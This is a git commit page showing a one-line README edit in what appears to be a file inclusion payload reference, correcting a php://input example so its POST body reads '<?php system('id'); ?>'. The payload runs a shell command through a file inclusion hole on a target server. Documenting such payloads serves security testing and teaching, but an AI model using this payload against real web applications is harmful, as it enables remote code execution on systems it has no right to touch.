Update README.md

This commit is contained in:
Milan Veljkovic 2018-11-19 12:45:01 +01:00 committed by GitHub
parent fd99da6c06
commit 59d0020c86
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -186,7 +186,7 @@ Specify your payload in the POST parameters
```powershell
http://example.com/index.php?page=php://input
POST DATA: <? system('id'); ?>
POST DATA: <?php system('id'); ?>
```
### Wrapper phar://